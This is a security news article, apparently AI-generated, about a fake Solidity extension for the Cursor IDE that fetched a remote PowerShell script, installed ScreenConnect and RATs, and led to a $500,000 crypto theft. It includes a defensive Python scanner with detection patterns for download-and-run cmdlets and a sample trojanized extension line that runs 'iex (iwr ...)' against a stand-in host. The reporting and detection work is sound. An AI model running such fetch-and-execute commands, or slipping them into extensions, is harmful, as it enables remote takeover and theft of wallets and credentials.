Ethical Hacking News
A $500,000 crypto theft was carried out using a malicious VSCode extension that impersonated a legitimate syntax highlighting tool for Ethereum smart contracts. This incident highlights the need for developers to be cautious when downloading extensions from open repositories and the importance of having robust security measures in place.
A fake VSCode extension called "Solidity Language" was published on the Open VSX registry and stole $500,000 in cryptocurrency from a Russian developer. The extension executed a PowerShell script that downloaded additional malicious payloads, including the ScreenConnect remote management tool. Once ScreenConnect was installed, threat actors gained full remote access to the developer's computer, uploading and executing additional malware. The incident highlights the dangers of downloading packages and extensions from open repositories without caution. Malicious extensions can be distributed through reputable platforms, emphasizing the need for developers to verify package authenticity before installation. The lack of antivirus software on the victim's machine made them particularly vulnerable to this attack, underscoring the importance of prioritizing cybersecurity measures.
The world of software development and cryptocurrency trading has witnessed another shocking incident involving a malicious extension for the popular Cursor AI IDE. According to reports from Kaspersky, a renowned cybersecurity firm, a fake VSCode extension named "Solidity Language" caused significant damage by leading to the theft of $500,000 in cryptocurrency from a Russian developer. In this article, we will delve into the details of this incident and explore the implications for developers and users.
The malicious extension was initially published on the Open VSX registry, a popular platform for distributing VSCode-compatible extensions. The extension claimed to be a syntax highlighting tool for working with Ethereum smart contracts, but in reality, it executed a PowerShell script from a remote host at angelic[.]su to download additional malicious payloads. The JavaScript file named "extension.js" located in the .cursor/extensions directory was found to contain the malicious code.
The extension's ability to impersonate the legitimate Solidity syntax highlighting extension made it convincing to users, who unknowingly downloaded and installed it. After installation, the malware executed a remote PowerShell script that checked if the remote management tool ScreenConnect was already installed on the system. If not, it executed another script to install ScreenConnect.
Once ScreenConnect was installed, the threat actors gained full remote access to the developer's computer, allowing them to upload and execute additional payloads, including a malicious executable from archive[.]org that contained a loader known as VMDetector. This malware installed two notorious pieces of malware: Quasar RAT (a remote access trojan capable of executing commands on devices) and PureLogs stealer (an infostealing malware that steals credentials and authentication cookies from web browsers, as well as cryptocurrency wallets).
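The chain described above starts with an extension.js that spawns PowerShell to fetch and run a remote script, behaviour a syntax highlighter never needs. As an added defensive example (not code from Kaspersky, Cursor, Open VSX or the article), the Python script below walks an extensions directory such as .cursor/extensions and flags any extension.js that combines process spawning, PowerShell invocation, a remote URL and download-and-execute cmdlets. The directory layout, the two sample extensions and the domain example.invalid are constructed for the demonstration.

```python
"""Heuristic scan of an editor extensions directory (e.g. ~/.cursor/extensions)
for extension.js files that spawn PowerShell or pull code from a remote host.
Added example for this article; it is not Kaspersky's, Cursor's or Open VSX
tooling, and the directory layout and sample extension contents are constructed."""
import re
import tempfile
from pathlib import Path

# Indicator classes. A syntax-highlighting extension has no reason to spawn a
# shell or to download and execute a remote script, so two or more classes
# matching in one file is treated as a finding worth manual review.
SUSPICIOUS_PATTERNS = {
    "spawns_process": re.compile(r"child_process|\bexec(?:Sync)?\s*\(|\bspawn(?:Sync)?\s*\("),
    "invokes_powershell": re.compile(r"powershell(?:\.exe)?|\bpwsh\b", re.IGNORECASE),
    "remote_url": re.compile(r"https?://[^\s'\"()]+"),
    "download_and_run": re.compile(
        r"Invoke-Expression|\biex\b|DownloadString|Invoke-WebRequest|\biwr\b", re.IGNORECASE),
}

FLAG_THRESHOLD = 2  # distinct indicator classes needed before a file is flagged


def scan_file(path):
    """Return {indicator_class: [matched strings]} for the classes found in one file."""
    text = Path(path).read_text(errors="replace")
    return {name: sorted(set(pat.findall(text)))
            for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(text)}


def scan_extensions_dir(root):
    """Walk <root>/<extension>/extension.js and return {extension_name: hits}
    for every extension reaching FLAG_THRESHOLD indicator classes."""
    findings = {}
    for ext_dir in sorted(p for p in Path(root).iterdir() if p.is_dir()):
        js = ext_dir / "extension.js"
        if not js.is_file():
            continue
        hits = scan_file(js)
        if len(hits) >= FLAG_THRESHOLD:
            findings[ext_dir.name] = hits
    return findings


# Constructed sample extensions (names and contents are invented for the demo).
BENIGN_EXTENSION = """\
const vscode = require("vscode");
// A highlighter only contributes grammars; a homepage URL alone is normal.
exports.activate = () => console.log("see https://example.invalid/theme-docs");
"""

TROJANIZED_EXTENSION = """\
const { exec } = require("child_process");
exports.activate = () => {
  // Fetches and runs a remote PowerShell script: the pattern the article describes.
  exec('powershell -c "iex (iwr http://example.invalid/bootstrap.ps1)"');
};
"""


def demo():
    """Build a throwaway extensions directory holding both samples and scan it."""
    root = Path(tempfile.mkdtemp(prefix="ext-scan-"))
    for name, body in (("benign-theme-1.0.0", BENIGN_EXTENSION),
                       ("fake-solidity-0.0.1", TROJANIZED_EXTENSION)):
        (root / name).mkdir()
        (root / name / "extension.js").write_text(body)
    return scan_extensions_dir(root)


if __name__ == "__main__":
    for name, hits in demo().items():
        print(f"FLAGGED {name}: {', '.join(sorted(hits))}")
```

Run it against a real extensions directory by calling `scan_extensions_dir(Path.home() / ".cursor" / "extensions")`; the two-class threshold keeps a lone homepage URL from producing noise, while a file that both spawns a shell and references download-and-execute cmdlets is exactly the kind of "extension" that deserves a look at its source before it is trusted.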
The incident highlights the dangers of downloading packages and extensions from open repositories. Kaspersky warns developers to be cautious when downloading tools from these sources, citing the fact that malicious packages continue to pose a significant threat to the crypto industry.
In this particular case, the malicious extension had been downloaded 54,000 times before it was removed on July 2, with an almost identical version published under the name "solidity" later in July, inflating the install count to nearly two million. This artificial inflation of download counts allowed the threat actors to increase their credibility and reach more users.
The attack demonstrates how easily malicious extensions can be distributed through reputable platforms, making it essential for developers to exercise extreme caution when downloading and installing new tools. Kaspersky's advice is clear: always verify that the package you're downloading isn't a fake, and if it doesn't work as advertised after installation, be suspicious and check the downloaded source code.
The incident also sheds light on the importance of developers having robust security measures in place. The fact that the victim had no antivirus software installed on their machine made them particularly vulnerable to this attack. This emphasizes the need for developers to prioritize cybersecurity, including installing reputable antivirus software and staying informed about emerging threats.
In conclusion, the malicious extension in the Cursor AI IDE serves as a stark reminder of the importance of cybersecurity awareness among developers and users alike. By understanding the tactics used by threat actors and taking steps to protect themselves, individuals can mitigate the risk of falling victim to similar attacks in the future.
Related Information:
https://www.ethicalhackingnews.com/articles/A-Malicious-Extension-in-the-Cursor-AI-IDE-A-500000-Crypto-Theft-Case-Study-ehn.shtml
https://www.bleepingcomputer.com/news/security/malicious-vscode-extension-in-cursor-ide-led-to-500k-crypto-theft/
Published: Mon Jul 14 12:43:33 2025 by llama3.2 3B Q4_K_M